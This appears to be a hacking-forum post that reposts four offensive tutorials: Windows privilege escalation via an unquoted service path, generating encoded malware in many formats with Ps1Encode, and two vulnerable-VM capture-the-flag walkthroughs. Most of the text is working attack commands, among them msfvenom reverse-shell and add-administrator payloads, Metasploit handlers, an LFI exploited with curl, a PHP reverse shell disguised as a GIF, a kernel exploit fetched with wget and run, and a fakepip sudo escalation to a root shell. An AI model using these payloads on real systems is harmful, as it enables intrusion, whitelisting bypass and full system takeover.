Login

**NINZA** · 05-14-2020, 09:37 AM

0			0

In this article, we are demonstrating Windows privilege escalation via Unquoted service Path. In penetration testing when we spawn command shell as a local user, it is not possible to check restricted file or folder, therefore we need to escalated privileges to get administrators access.
Table of Content

Introduction
Lab setup
Spawn command shell as local user
Escalated privilege via Prepend-migrate
Escalated privilege via Adding user Administrators Group
Escalated privilege via RDP & Sticky_keys

Unquoted service Path Vulnerability
Introduction
The vulnerability is related to the path of the executable that has a space in the filename and the file name is not enclosed in quote tags (“”). Also, if it has writable permissions, then an attacker can replace the executable file with its malicious exe file, so as to escalate admin privileges.
Lab set-up
Victim’s Machine: Windows 7
Attacker’s machine: Kali Linux
First, we have downloaded and installed a Vulnerable application naming photodex proshow in our windows system, which we found under

[To see content please register here]

Spawning Victim’s Machine
We need to compromise the windows machine at least once to gain the meterpreter session. As you can observe we already have victim’s meterpreter session. Now let’s open the command shell from here.
[Image: 9.png?w=687]

shell
1
shell
As you can observe, we have shell access as local_user and to get cmd as administrator we need to escalate its privileges. Firstly we can enumerate out all the services that are running on the victim’s machine and discover those that are not bounded inside quotes tag with help of the following command:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
1
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
So we have enumerated following path: C:\Program Files\Photodex\ProShow Producer\Scsiaccess.exe as you can see, there is not quotes tag around the path and also space in the filename.
[Image: 10.1.png?w=687]

Now let’s identify the folder permissions using the following command:
icacls scsiaccess.exe
1
icacls scsiaccess.exe
As you can observe it has writable permission for everyone which means user raj can overwrite this file.
[Image: 10.png?w=687]

Escalated privilege via Prepend-migrate
Now we can place any malicious exe file in the same folder that will give admin privilege when the service will be restarted, Windows will launch this executable instead of the genuine exe.
Open the terminal in kali Linux and type following command to generate exe payload using msfvenom.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 prependmigrate=true prependmigrateprocess=explorer.exe -f exe > /root/Desktop/scsiaccess.exe
1
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 prependmigrate=true prependmigrateprocess=explorer.exe -f exe > /root/Desktop/scsiaccess.exe
Above command will create a malicious exe file on the Desktop and now send this file to the victim. The payload migrates its process if the current process gets killed; hence the attacker will not lose his session if the victim kills the current process ID of the payload from its system.
[Image: 11.png?w=687]

Now replace the genuine executable file from the malicious exe, here I have renamed genuine Scsiaccess.exe to Scsiaccess.exe.orginal and uploaded malicious Scsiaccess.exe in the same folder and then reboot the victim’s machine.
move scsiaccess.exe scsiaccess.exe.orginal
upload /root/Desktop/scsiaccess.exe .
reboot
1
2
3
move scsiaccess.exe scsiaccess.exe.orginal
upload /root/Desktop/scsiaccess.exe .
reboot
[Image: 12.png?w=687]

Simultaneously we have start multi/handler listener in a new terminal to catch the meterpreter session with admin privilege.
use exploit/multi/handler
msf exploit(multi/handler) set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.107
msf exploit(multi/handler) set lport 1234
msf exploit(multi/handler) exploit
1
2
3
4
5
use exploit/multi/handler
msf exploit(multi/handler) set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.107
msf exploit(multi/handler) set lport 1234
msf exploit(multi/handler) exploit
Yuppie!! And after some time we got a shell with admin privileges.
[Image: 13.png?w=687]

Escalated privilege via Adding user Administrators Group
After spawning a shell as local_user, we enumerated all username list with or without admin privileges. So we found user:raaz is not a member of the admin group.
net user
net user raaz
1
2
net user
net user raaz
[Image: 14.png?w=687]

So again we generated an exe file which will add user:raaz into administrators group. The name of our exe file will be same i.e. Scsiaccess.exe
msfvenom -p windows/exec CMD='net localgroup administrators raaz /add' -f exe > /root/Desktop/scsiaccess.exe
1
msfvenom -p windows/exec CMD='net localgroup administrators raaz /add' -f exe > /root/Desktop/scsiaccess.exe
[Image: 15.png?w=687]

Now repeat the above steps, replace the genuine executable file from the malicious exe file and reboot the host machine.
[Image: 16.png?w=687]

If you will notice the following image, you can observe that the user raaz has become a member of the Administrators group.
[Image: 17.png?w=687]

Escalated privilege via RDP & Sticky_keys
Generate an exe using msfvenom with similar name Scsiaccess.exe and then transfer into victim’s machine, meanwhile run multi handler with autorun script which will enable RDP service once the service gets restarted.
use exploit/multi/handler
msf exploit(multi/handler) set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.107
msf exploit(multi/handler) set lport 1234
msf exploit(multi/handler) set AutoRunScript post/windows/manage/enable_rdp
msf exploit(multi/handler) exploit
1
2
3
4
5
6
use exploit/multi/handler
msf exploit(multi/handler) set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.107
msf exploit(multi/handler) set lport 1234
msf exploit(multi/handler) set AutoRunScript post/windows/manage/enable_rdp
msf exploit(multi/handler) exploit
[Image: 23.png?w=687]

Similarly, we will set the autorun script to enable sticky_keys once the service restarts.
msf exploit(multi/handler) set AutoRunScript post/windows/manage/sticky_keys
msf exploit(multi/handler) run
1
2
msf exploit(multi/handler) set AutoRunScript post/windows/manage/sticky_keys
msf exploit(multi/handler) run
As you can observe from the below screenshot, another meterpreter session (session 3) got opened which has administrative rights. Now let’s connect to the victim’s host via RDP.
rdesktop 192.168.1.101
1
rdesktop 192.168.1.101
[Image: 24.png?w=687]

Now press shift_key 5 times continuously and you will get command prompt as administrator.
[Image: 25.png?w=687]

Source: //www.exploit-db.com/exploits/24872/

In this article, we will learn the Ps1Encode tool and how to use it by generating malware in different file formats such as HTA, EXE, etc.
Introduction
The working code of Ps1Encode is developed by Piotr Marszalik, Dev Kennedy with few others. Ps1Encode is used to generate a malicious payload in order to generate a meterpreter session. While generating the payload, it will encode it too. It is a different way to bypass Whitelisting and security on the target system. It’s developed in ruby and allows us to create a series of payloads which are based on Metasploit but can be prepared in any format we desire. The final aim is to get a PowerShell running and execute our payload through it.
There are various formats for our malware that are supported by Ps1Encode are the following :

raw (encoded payload only – no powershell run options)
cmd (for use with bat files)
vba (for use with macro trojan docs)
vbs (for use with vbs scripts)
war (tomcat)
exe (executable) requires MinGW – x86_64-w64-mingw32-gcc [apt-get install mingw-w64]
java (for use with malicious java applets)
js (javascript)
js-rd32 (javascript called by rundll32.exe)
php (for use with php pages)
hta (HTML applications)
cfm (for use with Adobe ColdFusion)
aspx (for use with Microsoft ASP.NET)
lnk (windows shortcut – requires a webserver to stage the payload)
sct (COM scriptlet – requires a webserver to stage the payload)

You can download Ps1Encode from

[To see content please register here]

using git clone command as shown in the image below :
[Image: 1.png?w=687]

Once it’s downloaded, let’s use the help command to check the syntax that we have to use. Use the following set of commands for that :
cd ps1encode/
ls
./ps1encode.rb -h
1
2
3
cd ps1encode/
ls
./ps1encode.rb -h
[Image: 2.png?w=687]

Following are the syntaxes that we can use :
-i : defines localhost IP
-p : defines localhost port value
-a : defines payload value
-t : defines the output format
Now, we will generate a malicious raw file using the following command :
./ps1encode.rb -I 192.168.1.107 -p 8000 -a windows/meterpreter/reverse_https
1
./ps1encode.rb -I 192.168.1.107 -p 8000 -a windows/meterpreter/reverse_https
[Image: 3.png?w=687]

Copy the code generated using the above command in the file with the extension.bat. and then share it by using the python server. You can start the server using the following command :
python -m SimpleHTTPServer 80
1
python -m SimpleHTTPServer 80
[Image: 4.1.png?w=687]

Simultaneously, start the multi handler to have a session with the following set of commands :
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.107
lport 8000
exploit
1
2
3
4
5
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.107
lport 8000
exploit
[Image: 4.png?w=687]

Once the file is executed in the victims’ PC, you will have your session as shown in the image above. Now we will generate our malware in the form of HTA file. Use the following command to generate the HTA file :
./ps1encode.rb -i 192.168.1.107 -p 4444 -a windows/meterpreter/reverese_tcp -t hta
1
./ps1encode.rb -i 192.168.1.107 -p 4444 -a windows/meterpreter/reverese_tcp -t hta
[Image: 5.png?w=687]

Following script will be created due to the above command, send this file to the victim’s PC using python server like before.
[Image: 6.png?w=687]

Simultaneously, start the multi handler to have a session with the following set of commands :
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.107
set lport 8000
exploit
1
2
3
4
5
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.107
set lport 8000
exploit
[Image: 8.png?w=687]

Once the file is executed in the victims’ PC, you will have your session as shown in the image above. Now we will try and generate an EXE file with the following :
./ps1encode -i 192.168.1.107 -p 4444 -a windows/meterpreter/reverse_tcp -t exe
1
./ps1encode -i 192.168.1.107 -p 4444 -a windows/meterpreter/reverse_tcp -t exe
[Image: 9.png?w=687]

Send this file to the victim’s PC using python server like before a shown in the image above. Simultaneously, start the multi handler to have a session with the following set of commands :
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.107
set lport 8000
exploit
1
2
3
4
5
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.107
set lport 8000
exploit
[Image: 10.png?w=687]

This way, you can use Ps1Encode to generate files in any format. As you can see, it’s pretty simple and convenient along with being user-friendly. Possibilities with Ps1Encode are endless.

Hello readers and welcome to another CTF challenge. This VM is made by Frank Tope as you’ll see on the very homepage on the server’s website (his resume). Nice touch, if I might add. Anyhow, you can download this VM from vulnhub

[To see content please register here]

. The aim of this lab is to get root and read the congratulatory message written in the flag.
I would rate the difficulty level of this lab to be intermediate. Although, there were no buffer overflows or unnecessary exploit development, yet it did make us think a little.
Steps Involved:

Port Scanning and IP clutching.
Directory busting port 80.
Directory busting port 8011.
Discovering LFI vulnerability.
Discovering an HTML backup file.
Cracking password hash
Logging in /development
Uploading a PHP shell disguised as GIF file.
Bypassing the check and triggering the file to get a netcat shell.
Privilege escalation to get the flag.

Alright then, let’s head into the VM all the way in.
The first step is as always, running netdiscover on the VM to grab the IP address. In my case, the IP was 192.168.1.103.
[Image: 1.png?w=687&ssl=1]

Once the IP was found, we ran nmap aggressive scan to enumerate all the open ports.
[Image: 2.png?w=687&ssl=1]

What was there to wait for after we saw port 80 open! We headed straight into the browser and a webpage got displayed which looked like a single page resume.
[Image: 3.png?w=687&ssl=1]

After not finding much, we chose to run directory buster dirb.
[Image: 5.png?w=687&ssl=1]

robots.txt seemed interesting at first but it had nothing at all. Another directory was /development. It looked like a testing site since it asked for the authentication.
[Image: 6.png?w=687&ssl=1]

We then chose to look into port 8011, after finding not much of the info. It looked like a backend to the development directory.
[Image: 7.png?w=687&ssl=1]

We ran one more dirb scan on this port.
[Image: 8.png?w=687&ssl=1]

We found an interesting directory called /api. We opened it in the browser immediately.
[Image: 9.png?w=687&ssl=1]

We modified the URL parameter to /api/<api-name> but only one API seemed to be working and that was
[Image: 10.png?w=687&ssl=1]

A message said, “no parameter called file passed to me.” It gave us a hint that we had to pass a parameter called file.
192.168.1.103:8011/api/files_api.php?file=/etc/passwd
1
192.168.1.103:8011/api/files_api.php?file=/etc/passwd
[Image: 11.png?w=687&ssl=1]

HAHA. They got us. But still, there was another thing left to try—bypassing parameter through curl.
curl -X POST -d "file=/etc/passwd"

[To see content please register here]

1
curl -X POST -d "file=/etc/passwd"

[To see content please register here]

As you can see, LFI is present here!
[Image: 12.png?w=687&ssl=1]

Now, we tried some methods, put our hands here and there but nothing worked with this LFI.
Meanwhile, another thing that got our attention was the development server. You had a development site, you have a development server, and hence there would be more than one html files or copies of html files (backups).
One such common file is index.html.bak
It was an arrow in the dark but it hit the bullseye!
[Image: 14.png?w=687&ssl=1]

We saved it and read it using cat utility.
[Image: 15.png?w=687&ssl=1]

It had a password hash! It took us no time to copy this in a text file called hash.txt and run John the Ripper on it.
[Image: 17.png?w=687&ssl=1]

It surely was the credentials to /development authentication.
frank:frank!!!!
[Image: 18.png?w=687&ssl=1]

And it opened up like a beautiful treasure!
[Image: 19.png?w=687&ssl=1]

The message on this page said that the uploader tool was only half completed. So, we went to /uploader directory
[Image: 20.png?w=687&ssl=1]

The uploader had a security check for images only (jpg, png, gif) and a size limitation too.
So, here is what we did.
Traverse to the directory: /usr/share/webshells/php/php-reverse-shell.php
Open it with a text editor and add GIF98 in the first line and save this file as shell.gif
[Image: 21.png?w=687&ssl=1]

Now, what this will do is that it will trick the uploader in believing the file is GIF when in reality, it is a PHP reverse shell.
So, we upload shell.gif using the uploader and the following message was received.
[Image: 22.png?w=687&ssl=1]

Now, the author said the file was uploaded to his uploads path. Let’s get a little perspective here.
Website’s name: Frank’s website
Uploader’s name: Frank uploader.
First message on the website: I love patterns
It took a while for us but we guessed it in the end, the upload’s directory would be named Frank uploads.
We tried many permutations for this directory like Frankupload, frankUploads, franksuploads etc. but the one that seemed to hit was FRANKuploads.
This step was tedious and time-consuming as there was no straight connection from anywhere to this directory.
[Image: 23.png?w=687&ssl=1]

Now, all was left to trigger this file. We know for a fact that double-clicking won’t do us any good so we used curl once again to get a shell.
We activated netcat on a terminal side by side and typed this following curl command:
curl –X POST –d "file=/var/www/development/uploader/FRANKuploads/shell.gif"

[To see content please register here]

1
curl –X POST –d "file=/var/www/development/uploader/FRANKuploads/shell.gif"

[To see content please register here]

On another terminal, we had activated netcat:
As soon as curl triggered the LFI vulnerability and requested for shell.gif, we got a netcat session!
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash");'
uname -a
1
2
3
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash");'
uname -a
[Image: 25.png?w=687&ssl=1]

After a bit of surfing, we found a Linux Kernel exploit for version 2.6
searchsploit 15285
cd Desktop
cp /usr/share/exploitdb/exploits/linux/local/15285.c .
python -m SimpleHTTPServer 80
1
2
3
4
searchsploit 15285
cd Desktop
cp /usr/share/exploitdb/exploits/linux/local/15285.c .
python -m SimpleHTTPServer 80
[Image: 26.png?w=687&ssl=1]

On our VM shell, we downloaded this exploit, compiled it and ran it to get root!
cd tmp
wget

[To see content please register here]

gcc 15285.c -o 15285
chmod 777 15285
./15285
1
2
3
4
5
cd tmp
wget

[To see content please register here]

gcc 15285.c -o 15285
chmod 777 15285
./15285
Voila! We got root!
cd root
ls
cat root.txt
1
2
3
cd root
ls
cat root.txt
[Image: 27.png?w=687&ssl=1]

And there it was, the flag. Hope you enjoyed because we sure did!

Hello friends! Today we are going to take another CTF challenge known as Wakanda and it is another capture the flag challenge provided for practice. So let’s try to break through it. But before please note that you can download it from

[To see content please register here]

.
Security Level: Intermediate
Flags: There are three flags (flag1.txt, flag2.txt, root.txt)
Penetrating Methodologies

Network Scanning (Nmap, netdiscover)
HTTP service enumeration
Exploiting LFI using php filter
Decode the base 64 encoded text for password
SSH Login
Get 1st Flag
Finding files owned by devops
Overwrite antivirus.py via malicious python code
Get netcat session
Get 2nd flag
Sudo Privilege Escalation
Exploit Fake Pip
Get the Root access and Capture the 3rd flag

WalkThrough
Let’s start off with scanning the network to find our target.
netdiscover
1
netdiscover
[Image: 1.png?w=687&ssl=1]

We found our target –> 192.168.1.124
Our next step is to scan our target with NMAP.
nmap -p- -A 192.168.1.124
1
nmap -p- -A 192.168.1.124
[Image: 2.png?w=687&ssl=1]

The NMAP output shows us that there are 4 ports open: 80 (HTTP), 111 (RPC), 333(SSH), 48920(RPC)
Browsed the URL

[To see content please register here]

and poked around; however, we were not able to get any significant clues to move forward
[Image: 3.png?w=687&ssl=1]

We didn’t find anything on the webpage so we use dirb to enumerate the directories.
dirb

[To see content please register here]

1
dirb

[To see content please register here]

All the pages that we find in the dirb scan have size zero and we don’t find any content on any of the pages. We take a look at the source page of the index file and we find a “lang” parameter commented inside the page.
[Image: 4.png?w=687&ssl=1]

We use the “lang” parameter, just like it was shown in the page and find the text has been converted into French. Now we check if the “lang” parameter is vulnerable to LFI.
[Image: 5.png?w=687&ssl=1]

We are able to exploit the LFI vulnerability using “php://filter/convert.base64-encode” function and access the index page.
curl

[To see content please register here]

1
curl

[To see content please register here]

We decode the base64 encoded string and find the password “Niamey4Ever227!!!”. On the page, we find that “mamadou” is the author. We use these credentials to login through ssh on the target machine.
[Image: 9.png?w=687&ssl=1]

When we login through ssh we get a python IDE prompt. We import the pty module and spawn ‘/bin/bash’ shell. We take a look at the home directory for user mamaduo and find the first flag.
ssh [email protected] -p 3333
1
ssh [email protected] -p 3333
[Image: 10.png?w=687&ssl=1]

Enumerating through the directories, inside /tmp directory we find a file called test. We open it and find nothing interesting, but when we take a closer look at the file we find it that is owned by a devops. Now we find all the files owned by user devops and find a file called “.antivirus.py” inside /srv directory.
find / -user devops 2>/dev/null
1
find / -user devops 2>/dev/null
[Image: 11.png?w=687&ssl=1]

Now when we open the python file we find that it is opening and test file and writing “test” inside it. To exploit this, we replace the code with shellcode. First, we create a msfvenom payload.
msfvenom -p cmd/unix/reverse_python lhost=192.168.1.134 lport=4444 R
1
msfvenom -p cmd/unix/reverse_python lhost=192.168.1.134 lport=4444 R
[Image: 12.png?w=687&ssl=1]

After creating the payload, we open the “. antivirus.py” file and comment out the earlier code and insert our payload without adding “python -c”.
[Image: 13.png?w=687&ssl=1]

We set up our listener using netcat, we wait for a few minutes for the script to get executed. As soon as the script is executed we get a reverse shell. When we check the UID we find that we spawned a shell for devops. Now we go to /home/devops directory and find the second flag. After getting the second flag we find that we can execute pip is a superuser without root.
[Image: 14.png?w=687&ssl=1]

Now there is a script called Fakepip (download

[To see content please register here]

), that can be used to exploit this vulnerability.
[Image: 15.png?w=687&ssl=1]

We download the fakepip script into our system to edit the payload inside.
git clone

[To see content please register here]

1
git clone

[To see content please register here]

We edit the payload inside os.system function.
[Image: 17.1.png?w=687&ssl=1]

We decode the base64 encoded string and change the IP address to our IP address. Then we again convert the string to base64 and replace the older string with the new one.
[Image: 17.png?w=687&ssl=1]

We start the python server on our system so that we can upload the FakePip script into the target machine.
python -m SimpleHTTPServer 80
1
python -m SimpleHTTPServer 80
[Image: 16.1.png?w=687&ssl=1]

After we start HTTP server, we download the script on the target machine using wget. Now execute the command as per the instructions were given to us on the FakePip readme file.
wget

[To see content please register here]

sudo pip install . --upgrade --force-reinstall
1
2
wget

[To see content please register here]

sudo pip install . --upgrade --force-reinstall
[Image: 18.png?w=687&ssl=1]

As soon as we run the command we get a reverse shell as the root user. We now go to the root directory and find the root flag.
[Image: 25.png?w=687&ssl=1]

Login
Username: Password: Lost Password? Remember me
Or Register an account

Announcement : For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis